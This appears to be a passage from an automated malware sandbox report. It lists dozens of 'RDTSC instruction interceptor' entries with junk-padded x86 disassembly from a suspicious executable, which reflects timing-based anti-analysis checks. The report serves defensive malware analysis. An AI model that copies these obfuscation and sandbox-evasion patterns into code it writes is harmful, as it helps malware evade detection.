Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990937 second address: 799094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990A48 second address: 7990A64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64798h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990A64 second address: 7990A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C6D17D0AAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990A7E second address: 7990A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990A84 second address: 7990ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007F8C6D17D0B9h 0x0000000f nop 0x00000010 pushad 0x00000011 mov bx, cx 0x00000014 mov ch, A9h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F8C6D17D0B2h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8C6D17D0B7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990ADC second address: 7990AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64794h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990AF4 second address: 7990AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990AF8 second address: 7990B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C6CC6478Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990B0F second address: 7990BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F8C6D17D0ADh 0x0000000b or esi, 79889436h 0x00000011 jmp 00007F8C6D17D0B1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b pushad 0x0000001c pushad 0x0000001d mov eax, 01464779h 0x00000022 mov di, si 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007F8C6D17D0B0h 0x0000002c call 00007F8C6D17D0B2h 0x00000031 pop eax 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 mov dh, ah 0x00000038 pushfd 0x00000039 jmp 00007F8C6D17D0B3h 0x0000003e sbb ecx, 46A9177Eh 0x00000044 jmp 00007F8C6D17D0B9h 0x00000049 popfd 0x0000004a popad 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F8C6D17D0ADh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990BB8 second address: 7990BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC6478Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990C61 second address: 7990C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 00000001h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C6D17D0B6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990C87 second address: 7990C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990C8D second address: 7990CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F8C6D17D0B6h 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov di, 7530h 0x00000018 mov bh, B4h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990CB9 second address: 7990CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C6CC64790h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990CDF second address: 7990CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990D31 second address: 7990D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990D36 second address: 7990D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990D3C second address: 7990D63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b mov dh, ch 0x0000000d mov bx, 45DCh 0x00000011 popad 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 mov dh, 74h 0x00000017 movzx ecx, bx 0x0000001a popad 0x0000001b js 00007F8CDAC030E8h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990D63 second address: 7990D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990D71 second address: 7990DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C6CC64791h 0x00000008 pop ecx 0x00000009 mov bh, 83h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebp-04h] 0x00000011 pushad 0x00000012 call 00007F8C6CC64796h 0x00000017 mov edx, ecx 0x00000019 pop esi 0x0000001a mov cl, dh 0x0000001c popad 0x0000001d mov dword ptr [esi+08h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edi 0x00000024 pop ecx 0x00000025 pushfd 0x00000026 jmp 00007F8C6CC64797h 0x0000002b sbb ecx, 16A1B22Eh 0x00000031 jmp 00007F8C6CC64799h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990DEC second address: 7990E2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F8C6D17D0AEh 0x00000011 push 00000001h 0x00000013 jmp 00007F8C6D17D0B0h 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990E2B second address: 7990E48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990E48 second address: 7990EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C6D17D0B7h 0x00000009 and esi, 681F87AEh 0x0000000f jmp 00007F8C6D17D0B9h 0x00000014 popfd 0x00000015 mov eax, 3C2E0C37h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007F8C6D17D0ADh 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F8C6D17D0ADh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990EA9 second address: 7990EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC6478Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990EB9 second address: 7990F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b jmp 00007F8C6D17D0B7h 0x00000010 nop 0x00000011 jmp 00007F8C6D17D0B6h 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F8C6D17D0B1h 0x0000001e add si, E406h 0x00000023 jmp 00007F8C6D17D0B1h 0x00000028 popfd 0x00000029 mov ebx, eax 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F27 second address: 7990F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F2B second address: 7990F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F31 second address: 7990F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F87 second address: 7990F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F99 second address: 7990F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F9D second address: 799107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F8CDB11B7B0h 0x0000000e jmp 00007F8C6D17D0B7h 0x00000013 mov eax, dword ptr [ebp-14h] 0x00000016 jmp 00007F8C6D17D0B6h 0x0000001b mov ecx, esi 0x0000001d pushad 0x0000001e movzx esi, dx 0x00000021 mov al, dh 0x00000023 popad 0x00000024 mov dword ptr [esi+0Ch], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 movzx eax, bx 0x0000002c pushfd 0x0000002d jmp 00007F8C6D17D0B3h 0x00000032 add eax, 655E0ACEh 0x00000038 jmp 00007F8C6D17D0B9h 0x0000003d popfd 0x0000003e popad 0x0000003f pushfd 0x00000040 jmp 00007F8C6D17D0B0h 0x00000045 adc ecx, 3789B348h 0x0000004b jmp 00007F8C6D17D0ABh 0x00000050 popfd 0x00000051 popad 0x00000052 mov edx, 759B06ECh 0x00000057 jmp 00007F8C6D17D0B6h 0x0000005c sub eax, eax 0x0000005e jmp 00007F8C6D17D0B1h 0x00000063 lock cmpxchg dword ptr [edx], ecx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799107D second address: 7991081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991081 second address: 7991087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991087 second address: 79910AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64792h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C6CC6478Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910AC second address: 79910B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910B0 second address: 79910B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910B6 second address: 79910BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910BC second address: 79910C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910C0 second address: 79910C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910C4 second address: 79910D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910D4 second address: 79910E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910E5 second address: 7991105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F8CDAC02D68h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991105 second address: 799110D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799110D second address: 7991147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, CFh 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f movsx ebx, cx 0x00000012 mov ecx, 54F445EDh 0x00000017 popad 0x00000018 mov eax, dword ptr [esi] 0x0000001a jmp 00007F8C6CC64798h 0x0000001f mov dword ptr [edx], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991147 second address: 7991164 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991164 second address: 7991181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991181 second address: 79911A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dh, cl 0x0000000b popad 0x0000000c mov dword ptr [edx+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911A9 second address: 79911AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911AF second address: 79911B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911B3 second address: 79911B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911B7 second address: 79911F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d mov ebx, 01BDFFB4h 0x00000012 pop edi 0x00000013 push ecx 0x00000014 mov bx, 914Ch 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d pushad 0x0000001e mov bh, al 0x00000020 mov ebx, 2D3A4B4Eh 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+0Ch] 0x00000029 pushad 0x0000002a mov dx, 7626h 0x0000002e mov edi, 707DCEB2h 0x00000033 popad 0x00000034 mov dword ptr [edx+0Ch], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911F4 second address: 79911F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911F8 second address: 79911FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911FE second address: 799121A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64798h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799121A second address: 799121E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799121E second address: 799122F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799122F second address: 7991233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991233 second address: 799124B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799124B second address: 799125D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799125D second address: 7991298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e pushad 0x0000000f mov si, F21Bh 0x00000013 jmp 00007F8C6CC64790h 0x00000018 popad 0x00000019 mov eax, dword ptr [esi+14h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8C6CC6478Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991298 second address: 79912A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79912A7 second address: 79912AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79912AD second address: 7991303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b jmp 00007F8C6D17D0B7h 0x00000010 mov eax, dword ptr [esi+18h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F8C6D17D0ABh 0x0000001c xor cx, F43Eh 0x00000021 jmp 00007F8C6D17D0B9h 0x00000026 popfd 0x00000027 mov edx, esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991303 second address: 7991309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991309 second address: 799130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799130D second address: 799132C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b jmp 00007F8C6CC6478Bh 0x00000010 mov eax, dword ptr [esi+1Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799132C second address: 7991330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991330 second address: 7991334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991334 second address: 799133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799133A second address: 7991350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, 5FC3ADB0h 0x00000013 mov eax, ebx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991350 second address: 79913CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop ebx 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 mov si, 674Bh 0x00000017 popad 0x00000018 mov dword ptr [edx+20h], eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F8C6D17D0ACh 0x00000022 jmp 00007F8C6D17D0B5h 0x00000027 popfd 0x00000028 movzx ecx, di 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+24h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dx, ax 0x00000035 pushfd 0x00000036 jmp 00007F8C6D17D0B0h 0x0000003b and eax, 19FB19E8h 0x00000041 jmp 00007F8C6D17D0ABh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79913CD second address: 79913D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79913D3 second address: 79913D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79913D7 second address: 7991423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007F8C6CC64797h 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F8C6CC64792h 0x0000001c xor cx, EEA8h 0x00000021 jmp 00007F8C6CC6478Bh 0x00000026 popfd 0x00000027 rdtsc
